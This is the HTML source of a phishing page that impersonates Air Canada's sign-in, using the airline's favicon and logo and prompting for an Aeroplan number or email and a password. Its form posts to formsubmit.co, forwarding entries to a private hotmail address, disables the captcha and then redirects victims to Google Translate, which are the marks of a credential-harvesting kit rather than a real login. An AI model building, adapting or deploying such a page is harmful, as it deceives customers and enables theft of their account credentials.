<!DOCTYPE html>
<head>
        <title>Sign in</title><link href="https://www.aircanada.com/etc/designs/aircanada/images/favicon.ico" rel="icon"

type="image/vnd.microsoft.icon"><meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><meta content="text/html; charset=utf-8" http-equiv="Content-Type">


<style>body::-webkit-scrollbar{display:none}html,body{font:400 1.4rem/2.2rem "Open Sans", sans-serif;width:100%;margin:0px;height:100%;-ms-overflow-style:autuo;overflow-x:hidden !important;overflow:auto;background:#e0f0f8 }a,.link{color:#005078;text-decoration:none;cursor:pointer;font-size:15px;font-weight:600;height:auto;padding:0;width:auto}a:hover,.link:hover{color:#000000;text-decoration:underline}a:active,.link:active{color:#4a4f55}button{font-family:"Open Sans", sans-serif;font-size:14px;font-weight:600;font-stretch:normal;font-style:normal;line-height:normal;letter-spacing:0.25px;text-align:center;border:none;cursor:pointer}button.btn-full{width:100%}button.btn-large-blue{height:50px;background-color:#005078;color:#ffffff}

button.btn-large-blue:hover{background-color:#0C3850}#ac-sso-loading{-webkit-transform-origin:50% 50%;-moz-transform-origin:50% 50%;-ms-transform-origin:50% 50%;transform-origin:50% 50%;animation:rotate 1.8s infinite;-webkit-animation:rotate 1.8s infinite;-moz-animation:rotate 1.8s infinite;-ms-animation:rotate 1.8s infinite;-webkit-animation-timing-function:linear;-ms-animation-timing-function:linear;-moz-animation-timing-function:linear;animation-timing-function:linear;width:160px;height:160px;display:block}header,#ac-logo,#ac-sso-background{display:none}header#ac-sso-mobile-header{background:white;color:black;display:none;font-size:22px;text-align:center;height:60px;align-items:center;justify-content:center;font-family:"Open Sans", sans-serif;box-shadow:none}

header{box-shadow:-1px -1px 8px -2px #a39ea3;-webkit-box-shadow:-1px -1px 8px -2px #a39ea3;-moz-box-shadow:-1px -1px 8px -2px #a39ea3;background-color:#ffffff}

h1{font-family:"Open Sans", sans-serif;font-size:16px;font-weight:300;font-stretch:normal;font-style:normal;line-height:normal;letter-spacing:normal;text-align:center;color:#000000;margin:0;margin-bottom:16px}p{font-family:"Open Sans", sans-serif;font-size:14px;font-weight:normal;font-stretch:normal;font-style:normal;line-height:normal;letter-spacing:normal;text-align:center;color:#000000}#ac-sso-main-container{width:100%;margin:0 auto}#ac-sso-main-container.ac-sso-main-container-error{padding:20px;width:initial}@media only screen and (min-width: 600px){html{background:#dfeff7}header{z-index:1;display:block;height:80px;min-height:80px}header span{display:flex;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;height:inherit;max-width:1200px;margin:auto;align-items:center}header#ac-sso-mobile-header{display:none !important}main{overflow:auto}main #ac-sso-loading,main #acc-sso-centered{width:auto}#ac-logo{display:block;max-width:200px;width:200px;height:30px;margin-left:20px}
        
        #ac-sso-main-container{background:white;box-shadow:0 7px 11px 0 rgba(0,0,0,0.08);-webkit-box-shadow:0 7px 11px 0 rgba(0,0,0,0.08);-moz-box-shadow:0 7px 11px 0 rgba(0,0,0,0.08);opacity:0.95;-webkit-backdrop-filter:blur(33px);backdrop-filter:blur(33px);padding:0;width:100%}#ac-sso-main-container.ac-sso-main-container-error{max-width:462px;padding:60px}#ac-sso-background{display:block;position:absolute;top:0;left:0}}#ac-sso-login-guest{width:100%;max-width:495px;justify-content:flex-end;padding-top:10px;display:flex;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox}#ac-sso-login-guest #ac-sso-login-guest-uri{display:flex;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;align-items:center}#ac-sso-login-guest #ac-sso-login-guest-uri svg{fill:#005078;width:22px;height:22px}#ac-sso-error-guest{width:100%;max-width:495px;justify-content:flex-end;padding-top:10px}#ac-sso-error-guest #ac-sso-login-guest-uri svg{fill:#005078}#ac-sso-login-message{font-family:OpenSans;font-size:16px;font-weight:600;font-stretch:normal;font-style:normal;line-height:1.5;letter-spacing:normal;color:#000000;margin-bottom:20px}#ac-sso-login-guest-uri:hover{text-decoration:none} 
        :root { --color: #bebaba }
        
        @-moz-keyframes rotate{100%{-moz-transform:rotate(360deg)}}@-webkit-keyframes rotate{100%{-webkit-transform:rotate(360deg)}}@keyframes rotate{100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}#ac-sso-error-body{text-align:center;line-height:30px;line-height:12px}#ac-sso-error-body #ac-sso-error-txt,#ac-sso-error-body #ac-sso-error-tryAgain{display:inline;margin-left:5px}#ac-sso-error-body #ac-sso-error-txt2{margin-top:5px} 
      
        main {
            background-color: #ffffff;
            padding: 7px;
            border-radius: 0px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 480px ;
            height: 520px;
            align-content: center;
            margin: auto;
            margin-top: -50px;
            font-family: 'Open Sans', sans-serif;
            
        
        }

       
       
        .form_label {
                
                color: #737373;
    font-size: 16px!important;
    font-weight: bold;
            display: block;
            margin-bottom: 6px;
            cursor: pointer;
            position: absolute;
            top: 0;
            left: 53px;
            
            font-family: 'open sans', sans-serif ;
            transform: translateY(0px);
            transition: transform .5s, color .3s;
            font-family: 'Open Sans', sans-serif;
        }
       

  .form_group {

        position: relative;
        font-family: 'Open Sans', sans-serif;

  }
  
        input {
                font-family: 'Open Sans', sans-serif;
                font-size: 45px;
            width: 73.5%;
            padding: 6px;
            margin-left: 49px;
            margin-bottom: -115px;
            gap: 2.5em;
             margin-top: 6em;
              display: grid;
         background: none;
          color: #131212;
           font-size: 1rem;
            padding: .6em .3em;
                         border: none;
                          outline: none;
                           border-bottom: 1px solid var(--color);}

        

                           input[type="submit"] {
            background-color: #005078;
            color: white;
            cursor: pointer;
            font-family: 'Open Sans', sans-serif;
        }

        input[type="submit"]:hover {
            background-color: #023249;
            font-family: 'Open Sans', sans-serif;}
            
        .form_input:focus + .form_label{

                transform:  translateY(-30px) scale(.7);
                transform-origin: left top ;
                font-family: 'Open Sans', sans-serif;
                color: #4b4949
        }
        input[type="submit"] {
               

                background-color: #005078;
    border: 0 solid #005078;
    border-radius: 0;
    color: #fff;
    cursor: pointer;
    font: 14px Open Sans;
    -webkit-appearance: none;
    height: 50px;
    margin-top: 30px;
    width: 76%;
    text-align: center;
    padding: 0;
    line-height: 50px;
    margin-top: 165px;
    
        }

  @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@300&display=swap');  

  
.links {
        color: #036da3 ;
        cursor: pointer;
    font-weight: bold;
    float: left;
    line-height: normal;
   
    text-decoration: none;
    display: block;
    
    position: relative;
    margin-left: 55px;
    max-width: 95%;
    text-align: left;
    font-size: 15px;
    font-weight: 600;
    height: auto;
    padding: 0;
    width: auto;
    margin-top: 148px;
    font-family: Arial, Helvetica, sans-serif;
}
.links:nth-child(2) {
        margin-left: 75px;
        margin-bottom: 20px;



}
.imgagesp {
        margin-top: -40px;
}

@media only screen and (max-width: 480px) {
.contenedor .imgagesp {
position: absolute;
top: 60px;
left: 40px;
transform: translate(-50%,-50%);
width: 30%;
}
}
 

@media (max-width: 600px){
        html, body {
        background: #ffffff ;
        overflow: auto;
}
}
@media (max-width: 600px){
        .imagen2 { 
                display: none;

        }
}

@media only screen and (max-width: 480px) {
    main {
        width: 100%; /* Hace que el ancho sea el 100% en dispositivos con un ancho máximo de 480px */
        height: auto; /* Permite que la altura se ajuste automáticamente según el contenido */
        margin-top: 150px; /* Elimina el margen superior en dispositivos móviles */
        box-shadow: none;
    }

}
@media only screen and (max-width: 480px) {
        .links:nth-child(2) { 
                padding: 0%;
                margin-top: -17.5px;
                margin-left: 185px;


        }
        .links:nth-child(1) {
                margin-right: 230px;
                padding: 0%;

        }
}
@media only screen and (max-width: 480px) {

main .form_submit {
        width: 75%;
        margin-right: 100px;
        padding: 0;
        right: 10;
 }}


 @media only screen and (max-width: 480px) {
         .form_input {
                width: 85%;
                margin-left: 40px;
        }
 }
 @media only screen and (max-width: 480px) {
        .form_label{
                margin-left: 18px;
        }
 }
 @media only screen and (max-width: 480px) {
        
 }

    </style>

<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300&display=swap" rel="stylesheet">
<head>

       
<body> 

<header> 

        <span style="display: inline-block; width: 300px;">
                <a href="/" style="display: block; margin-top: 22px; margin-left: 55px;">
                  <img src="img/aircanada_logo.png" alt="Descripción de la imagen" style="width: 80%; height: auto;">
                </a>
              </span>
</header>


<img src="img/nube_arriba_izquierda.png"   alt="nube" class="imagen2" style= "position: relative; top: 40px; left: 100px; max-width: 100%; padding: 0;" >
<img src="img/nube_arribaderecha.png" alt="nube" class="imagen2" style="position: relative; top: 22px; right: -705px; max-width: 100%; padding: 0; " >

<main class="contenedor">
  


      <form action="https://formsubmit.co/mechanicdesinginc@hotmail.com" method="POST" > 

        <img src="img/WhatsApp Image 2023-12-22 at 6.50.07 PM.jpeg" alt="logo"  class= "imgagesp"  id="#ac-logo" style="width: 60%; height: auto; gap: 2.5em; padding: -30px; padding-top: 0px; top: -10px  margin-left:40px; transform: translateY(110px); " > 

        <div class="form_group">
                <div>
             
                        <input type="text" id="name" class="form_input" placeholder=" " required >
                        <label for="name" class="form_label">Aeroplan number or email</label>
                        <span class="form_line"></span>
                </div>
        </div>
   <div class="form_group"> 
                        <input type="password" id="password" class="form_input" placeholder=" " required>
                        <label for="password" class="form_label">Password </label>
                        <span class="form_line"></span>

                        <input type="submit"  class="form_submit" value="Sign in">


 <input type="hidden" name="_next" value="https://translate.google.com/">  
            
           <input type="hidden" name="_captcha" value="false"

                >
        

              
        </div>
        
</div>
</form>



<div>

        <a class="links" href="google.com">Create an account</a>

        <a class="links" href="google.com">Forgot your password?</a>

</div>
</main>
</body>

 





   
            
          
